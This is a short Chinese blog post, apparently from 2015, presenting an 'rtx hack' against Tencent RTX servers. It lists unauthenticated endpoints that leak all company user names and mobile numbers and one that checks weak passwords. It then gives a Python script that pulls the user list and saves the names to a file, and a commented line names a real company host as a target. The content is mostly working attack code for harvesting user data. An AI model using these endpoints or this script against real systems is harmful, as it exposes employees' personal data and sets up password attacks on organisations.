http://RtxServerIp:8012/userlist.php #泄漏公司所有rtx用户
http://RtxServerIp:8012/getmobile.cgi?receiver= #泄漏用户手机号
http://RtxServerIp:8012/check.php #验证弱口令
此脚本只是用于抓取用户信息
#-*-coding=utf-8-*- # date : 2015年5月5日 # author : sanr # rtx hack import requests import sys import json if len(sys.argv) < 2: print ‘‘‘ rtx.py http://x.com:8012/userlist.php ‘‘‘ else: if sys.argv[1].startswith(‘htt‘): #判断传参是否以htt开头 r = requests.get(sys.argv[1]) js = json.loads(r.text) for each in js: print each[‘id‘],each[‘name‘].encode(‘utf8‘) #line = ‘%s\r\n‘ %(each[‘name‘].encode(‘utf8‘)) 跟下面一条一句同等 line = each[‘name‘].encode(‘utf8‘)+‘\r\n‘ f=open(‘rtx hack.txt‘,‘a‘) f.write(line) f.close() else: print ‘‘‘ Please add http:// ‘‘‘ #name(str=‘http://tgzdh.tangsteel.com:92/userlist.php‘) #name(raw_input(‘请输入网址:‘))
本文出自 “Sanr” 博客,请务必保留此出处http://0x007.blog.51cto.com/6330498/1641958
原文地址:http://0x007.blog.51cto.com/6330498/1641958